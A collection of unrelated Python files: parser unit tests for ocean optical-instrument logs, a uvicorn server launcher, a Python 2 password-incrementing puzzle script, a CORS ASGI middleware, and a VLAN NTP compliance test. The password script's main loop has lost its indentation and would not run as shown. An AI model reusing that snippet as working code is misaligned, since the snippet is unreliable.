38703, 38574, 38445, 38316, 38187, 38058, 37929, 37800, 37671, 37542, 37413,
37284, 37155, 37026, 36897, 36768, 36639, 36510, 36381, 36252, 36123, 35994,
35865, 35736, 35607, 35478, 35349, 35220, 35091, 34962, 34833, 34704, 34575,
34446, 34317, 34188, 34059, 33930, 33801, 33672, 33543, 33414, 33285, 33156,
33027, 32898, 32769])),
((3276558631.666), (3, 6, 9, 12, 15, 18, 21, 999, 125,
[0, 264, 528, 792, 1056, 1320, 1584, 1848, 2112, 2376, 2640, 2904, 3168,
3432, 3696, 3960, 4224, 4488, 4752, 5016, 5280, 5544, 5808, 6072, 6336, 6600,
6864, 7128, 7392, 7656, 7920, 8184, 8448, 8712, 8976, 9240, 9504, 9768,
10032, 10296, 10560, 10824, 11088, 11352, 11616, 11880, 12144, 12408, 12672,
12936, 13200, 13464, 13728, 13992, 14256, 14520, 14784, 15048, 15312, 15576,
15840, 16104, 16368, 16632, 16896, 17160, 17424, 17688, 17952, 18216, 18480,
18744, 19008, 19272, 19536, 19800, 20064, 20328, 20592, 20856, 21120, 21384,
21648, 21912, 22176, 22440, 22704, 22968, 23232, 23496, 23760, 24024, 24288,
24552, 24816, 25080, 25344, 25608, 25872, 26136, 26400, 26664, 26928, 27192,
27456, 27720, 27984, 28248, 28512, 28776, 29040, 29304, 29568, 29832, 30096,
30360, 30624, 30888, 31152, 31416, 31680, 31944, 32208, 32472, 32736],
[32767, 33031, 33295, 33559, 33823, 34087, 34351, 34615, 34879, 35143,
35407, 35671, 35935, 36199, 36463, 36727, 36991, 37255, 37519, 37783, 38047,
38311, 38575, 38839, 39103, 39367, 39631, 39895, 40159, 40423, 40687, 40951,
41215, 41479, 41743, 42007, 42271, 42535, 42799, 43063, 43327, 43591, 43855,
44119, 44383, 44647, 44911, 45175, 45439, 45703, 45967, 46231, 46495, 46759,
47023, 47287, 47551, 47815, 48079, 48343, 48607, 48871, 49135, 49399, 49663,
49927, 50191, 50455, 50719, 50983, 51247, 51511, 51775, 52039, 52303, 52567,
52831, 53095, 53359, 53623, 53887, 54151, 54415, 54679, 54943, 55207, 55471,
55735, 55999, 56263, 56527, 56791, 57055, 57319, 57583, 57847, 58111, 58375,
58639, 58903, 59167, 59431, 59695, 59959, 60223, 60487, 60751, 61015, 61279,
61543, 61807, 62071, 62335, 62599, 62863, 63127, 63391, 63655, 63919, 64183,
64447, 64711, 64975, 65239, 65503],
[32767, 32503, 32239, 31975, 31711, 31447, 31183, 30919, 30655, 30391,
30127, 29863, 29599, 29335, 29071, 28807, 28543, 28279, 28015, 27751, 27487,
27223, 26959, 26695, 26431, 26167, 25903, 25639, 25375, 25111, 24847, 24583,
24319, 24055, 23791, 23527, 23263, 22999, 22735, 22471, 22207, 21943, 21679,
21415, 21151, 20887, 20623, 20359, 20095, 19831, 19567, 19303, 19039, 18775,
18511, 18247, 17983, 17719, 17455, 17191, 16927, 16663, 16399, 16135, 15871,
15607, 15343, 15079, 14815, 14551, 14287, 14023, 13759, 13495, 13231, 12967,
12703, 12439, 12175, 11911, 11647, 11383, 11119, 10855, 10591, 10327, 10063,
9799, 9535, 9271, 9007, 8743, 8479, 8215, 7951, 7687, 7423, 7159, 6895, 6631,
6367, 6103, 5839, 5575, 5311, 5047, 4783, 4519, 4255, 3991, 3727, 3463, 3199,
2935, 2671, 2407, 2143, 1879, 1615, 1351, 1087, 823, 559, 295, 31],
[65535, 65271, 65007, 64743, 64479, 64215, 63951, 63687, 63423, 63159,
62895, 62631, 62367, 62103, 61839, 61575, 61311, 61047, 60783, 60519, 60255,
59991, 59727, 59463, 59199, 58935, 58671, 58407, 58143, 57879, 57615, 57351,
57087, 56823, 56559, 56295, 56031, 55767, 55503, 55239, 54975, 54711, 54447,
54183, 53919, 53655, 53391, 53127, 52863, 52599, 52335, 52071, 51807, 51543,
51279, 51015, 50751, 50487, 50223, 49959, 49695, 49431, 49167, 48903, 48639,
48375, 48111, 47847, 47583, 47319, 47055, 46791, 46527, 46263, 45999, 45735,
45471, 45207, 44943, 44679, 44415, 44151, 43887, 43623, 43359, 43095, 42831,
42567, 42303, 42039, 41775, 41511, 41247, 40983, 40719, 40455, 40191, 39927,
39663, 39399, 39135, 38871, 38607, 38343, 38079, 37815, 37551, 37287, 37023,
36759, 36495, 36231, 35967, 35703, 35439, 35175, 34911, 34647, 34383, 34119,
33855, 33591, 33327, 33063, 32799]))
]
# Expected tuples for data in file 20061225_061225.optaa6.log
EXPECTED_20061225_061225_optaa6 = [
((3376015945.000), ('2006-12-25 06:12:25', 9, 83, 1193052)),
((3376015945.000), (1, 2, 3, 4, 5, 6, 7, 666, 1,
[0],
[32767],
[32767],
[65535])),
((3376015945.666), (2, 4, 6, 8, 10, 12, 14, 1332, 2,
[0, 32767],
[32767, 65534],
[32767, 0],
[65535, 32768])),
((3376015946.332), (3, 6, 9, 12, 15, 18, 21, 1998, 3,
[0, 16383, 32766],
[32767, 49150, 65533],
[32767, 16384, 1],
[65535, 49152, 32769])),
((3376015946.998), (4, 8, 12, 16, 20, 24, 28, 2664, 4,
[0, 10922, 21844, 32766],
[32767, 43689, 54611, 65533],
[32767, 21845, 10923, 1],
[65535, 54613, 43691, 32769])),
((3376015947.664), (5, 10, 15, 20, 25, 30, 35, 3330, 5,
[0, 8191, 16382, 24573, 32764],
[32767, 40958, 49149, 57340, 65531],
[32767, 24576, 16385, 8194, 3],
[65535, 57344, 49153, 40962, 32771])),
((3376015948.330), (6, 12, 18, 24, 30, 36, 42, 3996, 6,
[0, 6553, 13106, 19659, 26212, 32765],
[32767, 39320, 45873, 52426, 58979, 65532],
[32767, 26214, 19661, 13108, 6555, 2],
[65535, 58982, 52429, 45876, 39323, 32770])),
((3376015948.996), (7, 14, 21, 28, 35, 42, 49, 4662, 7,
[0, 5461, 10922, 16383, 21844, 27305, 32766],
[32767, 38228, 43689, 49150, 54611, 60072, 65533],
[32767, 27306, 21845, 16384, 10923, 5462, 1],
[65535, 60074, 54613, 49152, 43691, 38230, 32769])),
((3376015949.662), (8, 16, 24, 32, 40, 48, 56, 5328, 8,
[0, 4681, 9362, 14043, 18724, 23405, 28086, 32767],
[32767, 37448, 42129, 46810, 51491, 56172, 60853, 65534],
[32767, 28086, 23405, 18724, 14043, 9362, 4681, 0],
[65535, 60854, 56173, 51492, 46811, 42130, 37449, 32768])),
((3376015950.328), (9, 18, 27, 36, 45, 54, 63, 5994, 9,
[0, 4095, 8190, 12285, 16380, 20475, 24570, 28665, 32760],
[32767, 36862, 40957, 45052, 49147, 53242, 57337, 61432, 65527],
[32767, 28672, 24577, 20482, 16387, 12292, 8197, 4102, 7],
[65535, 61440, 57345, 53250, 49155, 45060, 40965, 36870, 32775])),
((3376015950.994), (10, 20, 30, 40, 50, 60, 70, 6660, 10,
[0, 3640, 7280, 10920, 14560, 18200, 21840, 25480, 29120, 32760],
[32767, 36407, 40047, 43687, 47327, 50967, 54607, 58247, 61887, 65527],
[32767, 29127, 25487, 21847, 18207, 14567, 10927, 7287, 3647, 7],
[65535, 61895, 58255, 54615, 50975, 47335, 43695, 40055, 36415, 32775]))
]
# Input files exercised by the tests below; all live in RESOURCE_PATH.
FILE1 = '20010314_010314.optaa1.log'
FILE2 = '20020704_020704.optaa2.log'
FILE3 = '20031031_031031.optaa3.log'
FILE4 = '20041220_041220.optaa4.log'
FILE5 = '20050401_050401.optaa5.log'
FILE6 = '20061225_061225.optaa6.log'
# Date-only name (no time component): the parser is expected to reject it.
FILE_BAD_FILENAME = '20190401.optaa19.log'
# Aliases pairing each verified file with its expected-particle table above.
EXPECTED_FILE1 = EXPECTED_20010314_010314_optaa1
EXPECTED_FILE2 = EXPECTED_20020704_020704_optaa2
EXPECTED_FILE3 = EXPECTED_20031031_031031_optaa3
EXPECTED_FILE6 = EXPECTED_20061225_061225_optaa6
RECORDS_FILE4 = 5  # 1 metadata, 4 instrument records
RECORDS_FILE6 = 11  # 1 metadata, 10 instrument records
EXCEPTIONS_FILE5 = 3  # number of exceptions expected
@attr('UNIT', group='mi')
class OptaaDjDclParserUnitTestCase(ParserUnitTestCase):
    """
    optaa_dj_dcl Parser unit test suite.

    Each test exercises both the recovered and the telemetered parser
    variants.  Separate state/publish/exception callbacks are kept for the
    two streams so a test can verify that the right stream was touched.
    """

    def create_rec_parser(self, file_handle, filename, new_state=None):
        """
        This function creates a OptaaDjDcl parser for recovered data.
        """
        return OptaaDjDclRecoveredParser(self.rec_config,
            file_handle, new_state, self.rec_state_callback,
            self.rec_pub_callback, self.rec_exception_callback, filename)

    def create_tel_parser(self, file_handle, filename, new_state=None):
        """
        This function creates a OptaaDjDcl parser for telemetered data.
        """
        # FIX: previously wired self.rec_state_callback here, so the
        # telemetered state callback was never exercised.  Use the
        # telemetered callback so tel_state_callback_value is updated.
        return OptaaDjDclTelemeteredParser(self.tel_config,
            file_handle, new_state, self.tel_state_callback,
            self.tel_pub_callback, self.tel_exception_callback, filename)

    def open_file(self, filename):
        """Open a test resource file for reading."""
        return open(os.path.join(RESOURCE_PATH, filename), mode='r')

    def rec_state_callback(self, state, file_ingested):
        """ Call back method to watch what comes in via the position callback """
        self.rec_state_callback_value = state
        self.rec_file_ingested_value = file_ingested

    def tel_state_callback(self, state, file_ingested):
        """ Call back method to watch what comes in via the position callback """
        self.tel_state_callback_value = state
        self.tel_file_ingested_value = file_ingested

    def rec_pub_callback(self, pub):
        """ Call back method to watch what comes in via the publish callback """
        self.rec_publish_callback_value = pub

    def tel_pub_callback(self, pub):
        """ Call back method to watch what comes in via the publish callback """
        self.tel_publish_callback_value = pub

    def rec_exception_callback(self, exception):
        """ Call back method to watch what comes in via the exception callback """
        self.rec_exception_callback_value = exception
        self.rec_exceptions_detected += 1

    def tel_exception_callback(self, exception):
        """ Call back method to watch what comes in via the exception callback """
        self.tel_exception_callback_value = exception
        self.tel_exceptions_detected += 1

    def setUp(self):
        """Reset parser configs and callback bookkeeping before each test."""
        ParserUnitTestCase.setUp(self)
        self.rec_config = {
            DataSetDriverConfigKeys.PARTICLE_MODULE: MODULE_NAME,
            DataSetDriverConfigKeys.PARTICLE_CLASS: None
        }
        self.tel_config = {
            DataSetDriverConfigKeys.PARTICLE_MODULE: MODULE_NAME,
            DataSetDriverConfigKeys.PARTICLE_CLASS: None
        }
        self.rec_state_callback_value = None
        self.rec_file_ingested_value = False
        self.rec_publish_callback_value = None
        self.rec_exception_callback_value = None
        self.rec_exceptions_detected = 0
        self.tel_state_callback_value = None
        self.tel_file_ingested_value = False
        self.tel_publish_callback_value = None
        self.tel_exception_callback_value = None
        self.tel_exceptions_detected = 0
        # Show full diffs on assertEqual failures (particle lists are long).
        self.maxDiff = None

    def test_bad_filename(self):
        """
        This test verifies that a DatasetParserException occurs if the filename
        is bad.
        """
        log.debug('===== START TEST BAD FILENAME =====')
        in_file = self.open_file(FILE_BAD_FILENAME)
        with self.assertRaises(DatasetParserException):
            parser = self.create_rec_parser(in_file, FILE_BAD_FILENAME)
        with self.assertRaises(DatasetParserException):
            parser = self.create_tel_parser(in_file, FILE_BAD_FILENAME)
        log.debug('===== END TEST BAD FILENAME =====')

    def test_big_giant_input(self):
        """
        Read a large file and verify that all expected particles can be read.
        Verification is not done at this time, but will be done during
        integration and qualification testing.
        """
        log.debug('===== START TEST BIG GIANT INPUT RECOVERED =====')
        in_file = self.open_file(FILE6)
        parser = self.create_rec_parser(in_file, FILE6)
        # In a single read, get all particles in this file.
        number_expected_results = RECORDS_FILE6
        result = parser.get_records(number_expected_results)
        self.assertEqual(len(result), number_expected_results)
        in_file.close()
        self.assertEqual(self.rec_exception_callback_value, None)
        log.debug('===== START TEST BIG GIANT INPUT TELEMETERED =====')
        in_file = self.open_file(FILE4)
        parser = self.create_tel_parser(in_file, FILE4)
        # In a single read, get all particles in this file.
        number_expected_results = RECORDS_FILE4
        result = parser.get_records(number_expected_results)
        self.assertEqual(len(result), number_expected_results)
        in_file.close()
        self.assertEqual(self.tel_exception_callback_value, None)
        log.debug('===== END TEST BIG GIANT INPUT =====')

    def test_checksum_errors(self):
        """
        This test verifies that records containing checksum errors
        are detected and that particles are not generated.
        """
        log.debug('===== START TEST CHECKSUM ERRORS =====')
        in_file = self.open_file(FILE5)
        parser = self.create_rec_parser(in_file, FILE5)
        # Try to get a record and verify that none are produced.
        # Verify that the correct number of checksum errors are detected.
        result = parser.get_records(1)
        self.assertEqual(result, [])
        self.assertEqual(self.rec_exceptions_detected, EXCEPTIONS_FILE5)
        in_file.close()
        in_file = self.open_file(FILE5)
        parser = self.create_tel_parser(in_file, FILE5)
        # Try to get a record and verify that none are produced.
        # Verify that the correct number of checksum errors are detected.
        result = parser.get_records(1)
        self.assertEqual(result, [])
        # FIX: previously re-checked rec_exceptions_detected, which was
        # trivially still EXCEPTIONS_FILE5 from the recovered pass above.
        # The telemetered counter is the one exercised by this parser.
        self.assertEqual(self.tel_exceptions_detected, EXCEPTIONS_FILE5)
        in_file.close()
        log.debug('===== END TEST CHECKSUM ERRORS =====')

    def test_get_many(self):
        """
        Read a file and pull out multiple data particles at one time.
        Verify that the results are those we expected.
        """
        log.debug('===== START TEST GET MANY RECOVERED =====')
        in_file = self.open_file(FILE2)
        parser = self.create_rec_parser(in_file, FILE2)
        # Generate a list of expected result particles.
        expected_particle = []
        for count, expected in enumerate(EXPECTED_FILE2):
            ntp_time, fields = expected
            # Generate expected particle
            if count == 0:
                particle = OptaaDjDclRecoveredMetadataDataParticle(fields,
                    internal_timestamp=ntp_time)
            else:
                particle = OptaaDjDclRecoveredInstrumentDataParticle(fields,
                    internal_timestamp=ntp_time)
            expected_particle.append(particle)
        # In a single read, get all particles for this file.
        result = parser.get_records(len(expected_particle))
        self.assertEqual(result, expected_particle)
        self.assertEqual(self.rec_exception_callback_value, None)
        in_file.close()
        log.debug('===== START TEST GET MANY TELEMETERED =====')
        in_file = self.open_file(FILE3)
        parser = self.create_tel_parser(in_file, FILE3)
        # Generate a list of expected result particles.
        expected_particle = []
        for count, expected in enumerate(EXPECTED_FILE3):
            ntp_time, fields = expected
            # Generate expected particle
            if count == 0:
                particle = OptaaDjDclTelemeteredMetadataDataParticle(fields,
                    internal_timestamp=ntp_time)
            else:
                particle = OptaaDjDclTelemeteredInstrumentDataParticle(fields,
                    internal_timestamp=ntp_time)
            expected_particle.append(particle)
        # In a single read, get all particles for this file.
        result = parser.get_records(len(expected_particle))
        self.assertEqual(result, expected_particle)
        self.assertEqual(self.tel_exception_callback_value, None)
        in_file.close()
        log.debug('===== END TEST GET MANY =====')

    def test_invalid_state(self):
        """
        This test verifies an exception is raised when an invalid state
        is used to initialize the parser.
        """
        log.debug('===== START TEST INVALID STATE =====')
        in_file = self.open_file(FILE1)
        # TIME_SINCE_POWER_UP is missing
        initial_state = {
            OptaaStateKey.POSITION: 12,
            OptaaStateKey.METADATA_GENERATED: True
        }
        with self.assertRaises(DatasetParserException):
            parser = self.create_rec_parser(in_file, FILE1, new_state=initial_state)
        # POSITION is missing
        initial_state = {
            OptaaStateKey.TIME_SINCE_POWER_UP: 1.345,
            OptaaStateKey.METADATA_GENERATED: True
        }
        with self.assertRaises(DatasetParserException):
            parser = self.create_tel_parser(in_file, FILE1, new_state=initial_state)
        # METADATA_GENERATED is missing
        initial_state = {
            OptaaStateKey.TIME_SINCE_POWER_UP: 1.345,
            OptaaStateKey.POSITION: 12,
        }
        with self.assertRaises(DatasetParserException):
            parser = self.create_rec_parser(in_file, FILE1, new_state=initial_state)
        # Instead of a dictionary, pass a list of dictionaries.
        initial_state = [
            {OptaaStateKey.POSITION: 12},
            {OptaaStateKey.METADATA_GENERATED: True},
            {OptaaStateKey.TIME_SINCE_POWER_UP: 1.345}
        ]
        with self.assertRaises(DatasetParserException):
            parser = self.create_tel_parser(in_file, FILE1, new_state=initial_state)
        log.debug('===== END TEST INVALID STATE =====')

    def test_mid_state_start(self):
        """
        Test starting a parser with a state in the middle of processing.
        """
        log.debug('===== START TEST MID-STATE START RECOVERED =====')
        in_file = self.open_file(FILE2)
        # Start at the beginning of record 4 (of 5 total)
        initial_state = {
            OptaaStateKey.POSITION: 177,
            OptaaStateKey.METADATA_GENERATED: True,
            OptaaStateKey.TIME_SINCE_POWER_UP: 0.222
        }
        parser = self.create_rec_parser(in_file, FILE2, new_state=initial_state)
        # Generate a list of expected result particles.
        expected_particle = []
        for count, expected in enumerate(EXPECTED_FILE2):
            if count >= 4:
                ntp_time, fields = expected
                particle = OptaaDjDclRecoveredInstrumentDataParticle(fields,
                    internal_timestamp=ntp_time)
                expected_particle.append(particle)
        # Get record and verify.
        result = parser.get_records(len(expected_particle))
        self.assertEqual(result, expected_particle)
        in_file.close()
        log.debug('===== START TEST MID-STATE START TELEMETERED =====')
        in_file = self.open_file(FILE1)
        # Start at the beginning of record 3 (of 3 total)
        initial_state = {
            OptaaStateKey.POSITION: 102,
            OptaaStateKey.METADATA_GENERATED: True,
            OptaaStateKey.TIME_SINCE_POWER_UP: 0.111
        }
        # FIX: previously built a recovered parser here even though this is
        # the telemetered half of the test and the expected particles are
        # Telemetered.  Use the telemetered parser.
        parser = self.create_tel_parser(in_file, FILE1, new_state=initial_state)
        # Generate a list of expected result particles.
        expected_particle = []
        for count, expected in enumerate(EXPECTED_FILE1):
            if count >= 3:
                ntp_time, fields = expected
                particle = OptaaDjDclTelemeteredInstrumentDataParticle(fields,
                    internal_timestamp=ntp_time)
                expected_particle.append(particle)
        # Get record and verify.
        result = parser.get_records(len(expected_particle))
        self.assertEqual(result, expected_particle)
        in_file.close()
        log.debug('===== END TEST MID-STATE START =====')

    def test_set_state(self):
        """
        This test verifies that the state can be changed after starting.
        Some particles are read and then the parser state is modified to
        skip ahead or back.
        """
        log.debug('===== START TEST SET STATE RECOVERED =====')
        in_file = self.open_file(FILE6)
        parser = self.create_rec_parser(in_file, FILE6)
        # Read and verify 4 particles (of the 11).
        # 1 metadata particle, 3 instrument particles.
        for count, expected in enumerate(EXPECTED_FILE6[ : 4]):
            ntp_time, fields = expected
            # Generate expected particle
            if count == 0:
                expected_particle = \
                    OptaaDjDclRecoveredMetadataDataParticle(fields,
                        internal_timestamp=ntp_time)
            else:
                expected_particle = \
                    OptaaDjDclRecoveredInstrumentDataParticle(fields,
                        internal_timestamp=ntp_time)
            # Get record and verify.
            result = parser.get_records(1)
            self.assertEqual(result, [expected_particle])
        # Skip ahead in the file so that we get the last 3 particles.
        new_state = {
            OptaaStateKey.POSITION: 469,
            OptaaStateKey.METADATA_GENERATED: True,
            OptaaStateKey.TIME_SINCE_POWER_UP: 0.666
        }
        # Set the state.
        parser.set_state(new_state)
        # Read and verify the last 3 particles.
        for count, expected in enumerate(EXPECTED_FILE6[-3: ]):
            ntp_time, fields = expected
            expected_particle = \
                OptaaDjDclRecoveredInstrumentDataParticle(fields,
                    internal_timestamp=ntp_time)
            # Get record and verify.
            result = parser.get_records(1)
            self.assertEqual(result, [expected_particle])
        in_file.close()
        log.debug('===== START TEST SET STATE TELEMETERED =====')
        in_file = self.open_file(FILE6)
        # FIX: previously built a recovered parser here even though the
        # expected particles below are Telemetered.  Use the telemetered
        # parser so this half of the test exercises the telemetered path.
        parser = self.create_tel_parser(in_file, FILE6)
        # Read and verify 8 particles (of the 11).
        # 1 metadata particle, 7 instrument particles.
        for count, expected in enumerate(EXPECTED_FILE6[ : 8]):
            ntp_time, fields = expected
            # Generate expected particle
            if count == 0:
                expected_particle = \
                    OptaaDjDclTelemeteredMetadataDataParticle(fields,
                        internal_timestamp=ntp_time)
            else:
                expected_particle = \
                    OptaaDjDclTelemeteredInstrumentDataParticle(fields,
                        internal_timestamp=ntp_time)
            # Get record and verify.
            result = parser.get_records(1)
            self.assertEqual(result, [expected_particle])
        # Go back in the file so that we get the last 8 particles.
        new_state = {
            OptaaStateKey.POSITION: 94,
            OptaaStateKey.METADATA_GENERATED: True,
            OptaaStateKey.TIME_SINCE_POWER_UP: 0.666
        }
        # Set the state.
        parser.set_state(new_state)
        # Read and verify the last 8 particles.
        for count, expected in enumerate(EXPECTED_FILE6[-8: ]):
            ntp_time, fields = expected
            expected_particle = \
                OptaaDjDclTelemeteredInstrumentDataParticle(fields,
                    internal_timestamp=ntp_time)
            # Get record and verify.
            result = parser.get_records(1)
            self.assertEqual(result, [expected_particle])
        in_file.close()
        log.debug('===== END TEST SET STATE =====')

    def test_simple(self):
        """
        Read data from a file and pull out data particles
        one at a time. Verify that the results are those we expected.
        """
        log.debug('===== START TEST SIMPLE RECOVERED =====')
        in_file = self.open_file(FILE1)
        parser = self.create_rec_parser(in_file, FILE1)
        for count, expected in enumerate(EXPECTED_FILE1):
            ntp_time, fields = expected
            # Generate expected particle
            if count == 0:
                expected_particle = \
                    OptaaDjDclRecoveredMetadataDataParticle(fields,
                        internal_timestamp=ntp_time)
            else:
                expected_particle = \
                    OptaaDjDclRecoveredInstrumentDataParticle(fields,
                        internal_timestamp=ntp_time)
            # Get record and verify.
            result = parser.get_records(1)
            self.assertEqual(result, [expected_particle])
        self.assertEqual(self.rec_exception_callback_value, None)
        in_file.close()
        log.debug('===== START TEST SIMPLE TELEMETERED =====')
        in_file = self.open_file(FILE2)
        parser = self.create_tel_parser(in_file, FILE2)
        for count, expected in enumerate(EXPECTED_FILE2):
            ntp_time, fields = expected
            # Generate expected particle
            if count == 0:
                expected_particle = \
                    OptaaDjDclTelemeteredMetadataDataParticle(fields,
                        internal_timestamp=ntp_time)
            else:
                expected_particle = \
                    OptaaDjDclTelemeteredInstrumentDataParticle(fields,
                        internal_timestamp=ntp_time)
            # Get record and verify.
            result = parser.get_records(1)
            self.assertEqual(result, [expected_particle])
        self.assertEqual(self.tel_exception_callback_value, None)
        in_file.close()
        log.debug('===== END TEST SIMPLE =====')
| StarcoderdataPython |
1933817 | import argparse
import uvicorn
from multidbutils._webserver.app import app
def main():
    """Parse CLI arguments and launch the py-multi-db-utility webserver."""
    parser = argparse.ArgumentParser(description="Run py-multi-db-utility Webserver")
    parser.add_argument("ip", nargs='?', metavar="ip", type=str,
                        help="Ip Address To Run Server On (Default: localhost).", default="localhost")
    parser.add_argument("port", nargs='?', metavar="port", type=int,
                        help="Port To Run Server On (Default: 8000).", default=8000)
    args = parser.parse_args()
    # argparse already converted the port with type=int, so no extra cast is needed.
    uvicorn.run(app, host=args.ip, port=args.port)


if __name__ == "__main__":
    main()
| StarcoderdataPython |
9771326 | <gh_stars>1-10
import re
def increment(password):
    """Advance *password* (a list of lowercase chars) to the next candidate.

    Works like a base-26 odometer: trailing 'z's roll over to 'a' and the
    next character to the left is bumped. Mutates the list in place and
    returns it.

    Fix: the original looped with a growing negative offset, so an all-'z'
    input wrapped around via negative indexing and incremented the wrong
    character instead of rolling over. Now a fully rolled-over password
    grows by one character (e.g. "zz" -> "aaa").
    """
    i = len(password) - 1
    while i >= 0:
        if password[i] == 'z':
            password[i] = 'a'
            i -= 1
        else:
            password[i] = chr(ord(password[i]) + 1)
            return password
    # Every character rolled over: extend like an odometer.
    password.insert(0, 'a')
    return password
password = list("<PASSWORD>")
count = 0
match = 0
while(1):
if len(re.findall("[iol]", "".join(password))):
pass
elif len(re.findall("(.)\\1", "".join(password))) < 2:
pass
else:
count = 0
for i, element in enumerate(password):
if i == len(password) - 1:
break
if ord(password[i + 1]) - ord(element) == 1:
count += 1
if count == 2:
print "pass"
count = 0
match = 1
break
else:
count = 0
if match:
break
password = increment(password)
print "".join(password)
| StarcoderdataPython |
3441755 | """
Adds the following features to an ASGI app:
* CORS middleware
"""
import functools
import re
import typing
from starlette.datastructures import Headers, MutableHeaders
from starlette.responses import PlainTextResponse
# Methods substituted when the caller passes "*" for allow_methods.
ALL_METHODS = ("DELETE", "GET", "OPTIONS", "PATCH", "POST", "PUT")
# Headers that CORS always permits without being listed explicitly
# (the CORS-safelisted request headers).
SAFELISTED_HEADERS = {
"Accept", "Accept-Language", "Content-Language", "Content-Type"
}
class CorsASGIApp:
    """ASGI middleware adding CORS support (simple and preflight requests).

    Non-CORS traffic (no ``Origin`` header) and non-http scopes are passed
    straight through to the wrapped app.
    """

    def __init__(
        self,
        app,
        origins: typing.Sequence[str] = (),
        allow_methods: typing.Sequence[str] = ("GET",),
        allow_headers: typing.Sequence[str] = (),
        allow_credentials: bool = False,
        allow_origin_regex: str = None,
        expose_headers: typing.Sequence[str] = (),
        max_age: int = 600,
    ) -> None:
        if "*" in allow_methods:
            allow_methods = ALL_METHODS

        compiled_allow_origin_regex = None
        if allow_origin_regex is not None:
            compiled_allow_origin_regex = re.compile(allow_origin_regex)

        # Headers attached to ordinary (non-preflight) responses.
        simple_headers = {}
        if "*" in origins:
            simple_headers["Access-Control-Allow-Origin"] = "*"
        if allow_credentials:
            simple_headers["Access-Control-Allow-Credentials"] = "true"
        if expose_headers:
            simple_headers["Access-Control-Expose-Headers"] = \
                ", ".join(expose_headers)

        # Headers attached to OPTIONS preflight responses.
        preflight_headers = {}
        if "*" in origins:
            preflight_headers["Access-Control-Allow-Origin"] = "*"
        else:
            preflight_headers["Vary"] = "Origin"
        preflight_headers["Access-Control-Allow-Methods"] = ", ".join(allow_methods)
        preflight_headers["Access-Control-Max-Age"] = str(max_age)
        allow_headers = sorted(SAFELISTED_HEADERS | set(allow_headers))
        if allow_headers and "*" not in allow_headers:
            preflight_headers["Access-Control-Allow-Headers"] = \
                ", ".join(allow_headers)
        if allow_credentials:
            preflight_headers["Access-Control-Allow-Credentials"] = "true"

        self.app = app
        self.origins = origins
        self.allow_methods = allow_methods
        self.allow_headers = [h.lower() for h in allow_headers]
        self.allow_all_origins = "*" in origins
        self.allow_all_headers = "*" in allow_headers
        self.allow_origin_regex = compiled_allow_origin_regex
        self.simple_headers = simple_headers
        self.preflight_headers = preflight_headers

    async def __call__(self, scope, receive, send) -> None:
        # NOTE(review): the wrapped app is invoked ASGI2-style (instantiate,
        # then call with receive/send) -- preserved as-is; confirm the
        # wrapped app actually follows that protocol.
        if scope["type"] != "http":  # pragma: no cover
            handler = await self.app(scope, receive, send)
            await handler.__call__(receive, send)
            return

        headers = Headers(scope=scope)
        origin = headers.get("origin")
        if origin is None:
            # Not a CORS request -- pass straight through.
            handler = await self.app(scope, receive, send)
            await handler.__call__(receive, send)
            return

        if scope["method"] == "OPTIONS" and "access-control-request-method" in headers:
            response = self.preflight_response(request_headers=headers)
            await response(scope, receive, send)
            return

        await self.simple_response(scope, receive, send, request_headers=headers)

    def is_allowed_origin(self, origin: str) -> bool:
        """Return True when *origin* is accepted by the configured policy."""
        if self.allow_all_origins:
            return True
        if self.allow_origin_regex is not None and \
                self.allow_origin_regex.fullmatch(origin):
            return True
        # Substring match against the configured origin list.
        return any(host in origin for host in self.origins)

    def preflight_response(self, request_headers) -> PlainTextResponse:
        """Build the response for a CORS preflight (OPTIONS) request."""
        requested_origin = request_headers["origin"]
        requested_method = request_headers["access-control-request-method"]
        requested_headers = request_headers.get("access-control-request-headers")

        headers = dict(self.preflight_headers)
        failures = []

        if self.is_allowed_origin(origin=requested_origin):
            if not self.allow_all_origins:
                headers["Access-Control-Allow-Origin"] = requested_origin
        else:
            failures.append("origin")

        if requested_method not in self.allow_methods:
            failures.append("method")

        if self.allow_all_headers and requested_headers is not None:
            headers["Access-Control-Allow-Headers"] = requested_headers
        elif requested_headers is not None:
            for header in [h.lower() for h in requested_headers.split(",")]:
                if header.strip() not in self.allow_headers:
                    failures.append("headers")

        if failures:
            failure_text = "Disallowed CORS " + ", ".join(failures)
            return PlainTextResponse(failure_text, status_code=400, headers=headers)
        return PlainTextResponse("OK", status_code=200, headers=headers)

    async def simple_response(self, scope, receive, send, request_headers) -> None:
        """Forward a non-preflight request, injecting CORS headers on send."""
        send = functools.partial(self.send, send=send, request_headers=request_headers)
        handler = await self.app(scope, receive, send)
        await handler(receive, send)

    async def send(self, message, send, request_headers) -> None:
        """Wrap the downstream ``send``, decorating http.response.start."""
        if message["type"] != "http.response.start":
            await send(message)
            return

        message.setdefault("headers", [])
        headers = MutableHeaders(scope=message)
        headers.update(self.simple_headers)
        origin = request_headers["Origin"]
        has_cookie = "cookie" in request_headers

        # With cookies, "*" is not a valid allow-origin value: echo the origin.
        if self.allow_all_origins and has_cookie:
            headers["Access-Control-Allow-Origin"] = origin
        elif not self.allow_all_origins and self.is_allowed_origin(origin=origin):
            headers["Access-Control-Allow-Origin"] = origin
            headers.add_vary_header("Origin")
        await send(message)
| StarcoderdataPython |
11251092 | <reponame>FrancoisLopez/netman<gh_stars>10-100
from hamcrest import assert_that, is_
from adapters.compliance_test_case import ComplianceTestCase
from netman.core.objects.exceptions import UnknownVlan
from tests import has_message
class SetVlanNtpStateTest(ComplianceTestCase):
    """Compliance checks for toggling NTP state on a VLAN."""

    _dev_sample = "cisco"

    def setUp(self):
        super(SetVlanNtpStateTest, self).setUp()
        self.client.add_vlan(2999, name="my-test-vlan")

    def test_disables_ntp_when_given_false(self):
        """NTP can be switched off on an existing VLAN."""
        self.try_to.set_vlan_ntp_state(2999, False)
        vlan_after = self.get_vlan_from_list(2999)
        assert_that(vlan_after.ntp, is_(False))

    def test_enables_ntp_when_given_true(self):
        """NTP can be switched on on an existing VLAN."""
        self.try_to.set_vlan_ntp_state(2999, True)
        vlan_after = self.get_vlan_from_list(2999)
        assert_that(vlan_after.ntp, is_(True))

    def test_raises_UnknownVlan_when_operating_on_a_vlan_that_does_not_exist(self):
        """Targeting a missing VLAN raises UnknownVlan with a clear message."""
        with self.assertRaises(UnknownVlan) as expect:
            self.client.set_vlan_ntp_state(2000, False)
        assert_that(expect.exception, has_message("Vlan 2000 not found"))

    def tearDown(self):
        self.janitor.remove_vlan(2999)
        super(SetVlanNtpStateTest, self).tearDown()
| StarcoderdataPython |
3372248 | #!/usr/bin/env python
